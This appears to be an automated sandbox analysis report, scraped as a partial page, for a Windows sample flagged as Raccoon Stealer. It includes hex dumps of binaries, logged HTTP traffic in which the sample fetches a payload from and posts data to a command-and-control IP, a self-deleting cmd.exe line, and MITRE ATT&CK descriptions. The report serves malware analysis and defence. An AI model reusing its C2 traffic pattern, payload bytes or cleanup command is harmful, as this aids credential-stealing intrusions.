0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata \|@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92
Dec 4, 2021 22:29:11.095187902 CET	1902	OUT	GET //l/f/EqqPhH0B3dP17Spz-q0u/f65289ae65b845a69c17cd35ec8393a2da58e887 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 194.180.174.40
Dec 4, 2021 22:29:11.387459993 CET	1903	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 04 Dec 2021 21:29:11 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Sun, 14 Nov 2021 14:06:12 GMT ETag: "619117d4-2b281b" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11 54 3f 57 4d ea 16 11 b1 29 39 42 d6 86 ce a3 f6 8e bf 00 9e ec 07 96 d8 0f 1c 6d 56 57 b4 9a 9b 8b bb ed 07 62 80 36 7b e5 11 7c 21 da 0f bc 08 ef d4 4f ec 07 12 01 4d 1a 89 8a e5 3e d6 3e c3 24 5c 2e 25 d4 d7 4c d2 88 7a 46 93 6c d0 a5 f6 03 33 9a 95 9d 01 b3 7c 08 b0 30 23 2a 4e 2b ee b7 1f 38 c4 9b e7 35 db 0f c0 ef 4e af e8 8a 55 34 2b 62 80 15 66 53 ff 03 32 3a 63 f6 8e 1f 03 7a e5 b6 04 c0 31 43 a9 1f 92 b6 da 0f 40 41 cd 9d 5a f8 26 b5 d6 a1 f6 95 77 6f 13 d5 d7 e2 16 fb 81 c3 00 52 40 04 Data Ascii: PKznN<{rinssdbm3.dll\|8NY6$J$1D a.jLVCN;}/$Z,TRqcEc=;{sp`A?MW!a?N~eAWo[},;+\Jw\|k<yR^Eonxsc=V,FcuwO[u{<w7P{K~Ewcz^[Z6GV2+n41M.w{fnJL{ dM+ /)$X!LK`MwILA8rIXr87}<]rTWmb6/_aWlB3n_joMz_Q8KgrLH.v6[4I{1g<>M$G&Y-O9\,tWmX Y3S<#}">0RBg,lh.sorp8)3Kvdsn3+]+krMu_Y\/8T&BC"u;ek u$~`{!M\WY37+nQZ3\G5dZhVLZ\|k5XFYlVVWC\|b\Zm 0PF8{]UpRW,nMMs_@>Q N>T?WM)9BmVWb6{\|!OM>>$\.%LzFl3\|0#N+85NU4+bfS2:cz1C@AZ&woR@
Dec 4, 2021 22:29:25.838085890 CET	4945	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV Content-Length: 1400 Host: 194.180.174.40
Dec 4, 2021 22:29:26.155703068 CET	4947	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 04 Dec 2021 21:29:26 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 32 38 0d 0a 63 39 64 35 39 32 31 30 66 30 64 62 65 35 66 66 36 36 36 63 35 30 32 34 61 66 63 32 33 30 32 62 34 32 37 62 34 62 33 61 0d 0a 30 0d 0a 0d 0a Data Ascii: 28c9d59210f0dbe5ff666c5024afc2302b427b4b3a0

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: 4FGVZW19n7.exe PID: 7084 Parent PID: 1400

General

Start time:	22:29:04
Start date:	04/12/2021
Path:	C:\Users\user\Desktop\4FGVZW19n7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\4FGVZW19n7.exe"
Imagebase:	0x400000
File size:	557056 bytes
MD5 hash:	2158D5620E153AAD7E5AB2C6069D4405
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.326178018.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000003.282477220.0000000002140000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.326412832.00000000020B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: cmd.exe PID: 6600 Parent PID: 7084

General

Start time:	22:29:25
Start date:	04/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\4FGVZW19n7.exe"
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6508 Parent PID: 6600

General

Start time:	22:29:26
Start date:	04/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: timeout.exe PID: 4008 Parent PID: 6600

General

Start time:	22:29:26
Start date:	04/12/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /T 10 /NOBREAK
Imagebase:	0xa90000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 4FGVZW19n7

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Raccoon Stealer

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre